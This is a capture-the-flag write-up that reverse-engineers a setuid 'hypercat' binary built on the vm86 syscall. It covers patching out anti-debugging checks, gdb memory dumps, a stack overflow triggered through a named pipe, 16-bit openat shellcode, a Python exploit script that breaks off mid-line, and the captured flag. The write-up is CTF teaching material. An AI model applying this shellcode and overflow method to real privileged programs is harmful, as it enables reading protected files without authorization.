$ cat file hello $ ./hypercat file hello However, hypercat on the key file doesn't print anything. After analyzing the executable in IDA, we find the following: * the binary first allocates a large region of memory at 0x10000 using mmap * then it xor-decrypts a chunk of bytes from .data with a key of 0xCC and copies them at 0x10100 * copies argv[1] (the file passed as parameter) to 0x102e3 * then it sets up a vm86plus_struct structure and repeatedly calls vm86 in a loop It also has some anti-debugging features which we must bypass in order to be able to run it under gdb * aborts if prctl(PR_GET_DUMPABLE) != 1 - we change a "jnz" to "jmp" to bypass it * checks for the AT_SECURE auxiliary vector and stores its value into some variable. This value will be 1 when running a setuid program and 0 otherwise. To bypass this we simply write 1 to that variable, unconditionally. * checks if (uid == euid) and if this happens writes 0 to a variable - we nop this check. == The vm86 call == vm86 is a Linux syscall which basically provides access to the cpu's virtual 8086 mode, in a controlled fashion. (i.e.: running 16bit code from the 32bit protected mode). In our case it is actually used as an anti-debugging technique, since you can't easily debug the stuff that runs in the virtual 8086 mode. Anyway, in order to use vm86 you first have to fill a vm86plus_struct with the initial values for the registers, then call the vm86 syscall with a subfunction parameter (in our case, VM_ENTER). The vm86 struct is set up like this: vm86_str.regs.eip = (__int32)((char *)mmap_addr + 0x100); vm86_str.regs.esp = (__int32)((char *)mmap_addr + 65534); vm86_str.regs.eax = 172; vm86_str.regs.ebx = 3; vm86_str.regs.ecx = 0; vm86_str.regs.edx = 0; vm86_str.regs.esi = 0; vm86_str.regs.edi = 0; vm86_str.regs.cs = (unsigned int)mmap_addr >> 4; vm86_str.regs.ss = (unsigned int)mmap_addr >> 4; vm86_str.regs.ds = (unsigned int)mmap_addr >> 4; vm86_str.regs.es = (unsigned int)mmap_addr >> 4; vm86_str.regs.fs = (unsigned int)mmap_addr >> 4; vm86_str.regs.gs = (unsigned int)mmap_addr >> 4; vm86_str.regs.eflags = 0; So, we see that eip starts at 0x10100, the address where that chunk of data was decrypted. This means that the mysterious data is actually some 16bit code. We extract it from the binary for further analysis. The main loop of the program looks something like this: lock_called = 0; while (1) { ret = vm86(VM_ENTER, &vm86_str); if ((ret & 0xff) != 2) { goto uninteresting_stuff; } if ((ret >> 8) != 0x80) { goto uninteresting_stuff; } if (vm86_str.regs.eax == __NR_lock) lock_called = 1; else if (vm86_str.regs.eax != __NR_open) do_syscall_with_params_from_vm86_str(); else { stat(vm86_str.regs.ebx, &stat_buf); if (!lock_called && ((stat_buf.st_mode & S_IFMT) != S_IFLNK) && !strstr(vm86_str.regs.ebx, "key")) do_syscall_with_params_from_vm86_str(); } } } When vm86 returns, the reason for returning is placed in the least significant 8 bits. A code of 2 means "exit due to the execution of an int instruction". The next 8 bits hold the number of the interrupt: the program wants them to be 0x80. So basically, the program waits until the vm86 code tries to do a syscall. If the syscall is not "lock" or "open" it is carried on without further checks. The lock syscall is some-kind-of-emulated, since Linux doesn't implement it. The interesting checks are for "open": the file shouldn't be a symlink and shouldn't have the string "key" in its name. That's why "hypercat /home/hypercat/key" doesn't work. The program also denies the execve syscall (not depicted in the pseudocode above). == The 16bit code == It consists of two parts: the first one relocates the second part from 1000:01AA to FFFF:7010, and also changes the stack segment from 1000 to FFFF. The second part does the actual job: * opens the file * checks (using fstat) that the file does not exceed 256 bytes in size (and prints a nice "buffer overflow" message if so) * reads the file's contents * writes the contents to stdout == The exploit == First, let's find out why our file shouldn't be bigger than 256. While we can't debug the 16bit code, we can still analyze it before every syscall it makes (remember that every int 80h causes the vm86 mode to exit). So, let's break before the read syscall. gdb-peda$ b *0x8048a12 if (*(unsigned *)($esp+0xa8 + 0x18) == 0x3) Breakpoint 1 at 0x8048a12 gdb-peda$ r file [----------------------------------registers-----------------------------------] EAX: 0x8002 EBX: 0x1 ECX: 0xbffff2d8 --> 0x7 EDX: 0x1 ESI: 0xa67 ('g\n') EDI: 0x102e0 --> 0x66cc0a67 EBP: 0xbffff3b8 --> 0xbffff438 --> 0x0 ESP: 0xbffff230 --> 0x1 EIP: 0x8048a12 (mov DWORD PTR [esp+0x48],eax) EFLAGS: 0x203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x8048a02: mov DWORD PTR [esp+0x4],eax 0x8048a06: mov DWORD PTR [esp],0x1 0x8048a0d: call 0x8048540 => 0x8048a12: mov DWORD PTR [esp+0x48],eax 0x8048a16: mov eax,DWORD PTR [esp+0x48] 0x8048a1a: movzx eax,al 0x8048a1d: cmp eax,0x2 0x8048a20: je 0x8048a4b [------------------------------------stack-------------------------------------] 0000| 0xbffff230 --> 0x1 0004| 0xbffff234 --> 0xbffff2d8 --> 0x7 0008| 0xbffff238 --> 0x58 ('X') 0012| 0xbffff23c --> 0x32 ('2') 0016| 0xbffff240 --> 0xffffffff 0020| 0xbffff244 --> 0x0 0024| 0xbffff248 --> 0xbffff4c0 --> 0x20 (' ') 0028| 0xbffff24c --> 0xbffff464 --> 0xbffff589 ("/root/hypercat3") [------------------------------------------------------------------------------] Legend: code, data, rodata, value Breakpoint 1, 0x08048a12 in ?? () The vm86plus_struct is at esp+0xa8, and eax has an offset of 0x18 inside the structure. Let's see what address is passed to the read syscall. This would be ecx (offset 4) gdb-peda$ x/xw ($esp+0xa8 + 0x4) 0xbffff2dc: 0x0010fee8 gdb-peda$ x/260xb 0x0010fee8 0x10fee8: 0x01 0x08 0x00 0x00 0x49 0x00 0x06 0x00 0x10fef0: 0xa4 0x81 0x01 0x00 0x00 0x00 0x00 0x00 0x10fef8: 0x00 0x00 0x00 0x00 0x06 0x00 0x00 0x00 0x10ff00: 0x00 0x10 0x00 0x00 0x08 0x00 0x00 0x00 0x10ff08: 0x99 0x5c 0x13 0x53 0xf0 0x95 0x1e 0x01 0x10ff10: 0x50 0x57 0x0a 0x53 0x84 0x7a 0x7b 0x13 0x10ff18: 0x50 0x57 0x0a 0x53 0x84 0x7a 0x7b 0x13 0x10ff20: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x10ff28: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x10ff30: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x10ff38: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x10ff40: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x10ff48: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x10ff50: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x10ff58: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x10ff60: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x10ff68: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x10ff70: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x10ff78: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x10ff80: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x10ff88: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x10ff90: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x10ff98: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x10ffa0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x10ffa8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x10ffb0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x10ffb8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x10ffc0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x10ffc8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x10ffd0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x10ffd8: 0x00 0x00 0x00 0x00 0x00 0x00 0x10 0x70 0x10ffe0: 0x00 0x00 0xff 0xff 0x07 0x00 0x00 0x00 0x10ffe8: 0x13 0x70 0x00 0x00 We see the value 0x7013 immediately after those 256 bytes. What does this value mean? We recall that the code is relocated from 0x1AA to 0x7010. Let's take a look: {{:writeups:h1.png|}} So 0x7013 is 0x1AD, the return address from sub_1B7 (sub_1B7 is the function that implements the second stage of the 16bit code). If we could read more than 256 bytes from the file, we could overwrite this return address. Let's look closer at the file size validation: {{:writeups:h2.png|}} The final value of edx (what read(2) receives) is something like ( (size-1) & 0xffff ). The check can be bypassed with a pipe: stat will report a size of 0, and edx will get a value of 0xffff, more than enough. Now, what should we overwrite the return address with? We would like to return to the beginning of our buffer (0x10fee8), but keep in mind that we're in 16 bit mode: the return address is 2 bytes long, and the cs was previously set to 0xffff. So, we have: 0xffff << 4 + ip = 0x10fee8 => ip = 0x10fee8 - 0xffff0 = 0xfef8 == The shellcode == The last part of the exploit is the shellcode. The shellcode will also run in 16bit mode, ant we can't directly open the key file and also can't execve. One solution is to use openat instead of open: .code16 .text call 2f 1: pop %ecx // compute the full address of the string and $0xffff, %ecx add $0xffff0, %ecx mov $295, %eax // __NR_openat mov $-100, %ebx // not important mov $0, %edx // O_RDONLY mov $0, %esi // not important int $0x80 mov %eax, %ebx mov $3, %eax // __NR_read mov $50, %edx int $0x80 mov $4, %eax // __NR_write mov $1, %ebx int $0x80 mov $1, %eax mov $10, %ebx int $0x80 2: call 1b path: .asciz "/home/hypercat/key" And the final exploit: #!/usr/bin/env/python from struct import pack f = open('shell.bin', 'r') shell = f.read() f.close() p = '' p += shell p += 'a' * (256 - len(p)) p += pack(' And running it (on the local machine): $ echo 'This is a key' > /home/hypercat/key $ mkfifo thepipe $ ./exploit.py > thepipe & [1] 9719 $ ./hypercat3 thepipe èWfYfáÿÿfÁðÿf¸'f»ÿÿÿfºf¾̀fÃf¸fº2̀f¸f»̀f¸f» è¦ÿ/home/hypercat/keyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaøþ This is a key /keyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[1]+ Done ./exploit.py > thepipe And remote: guest@notroot-virtual-machine:/tmp/ch$ /home/hypercat/hypercat thepipe èWfYfáÿÿfÁðÿf¸'f»ÿÿÿfºf¾̀fÃf¸fº2̀f¸f»̀f¸f» è¦ÿ/home/hypercat/keyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaøþ HArD0ar3_vxRT2ALIZ4T1on_IS_4lwWaY5_FuN aaaaaaaaaaa[1]+ Done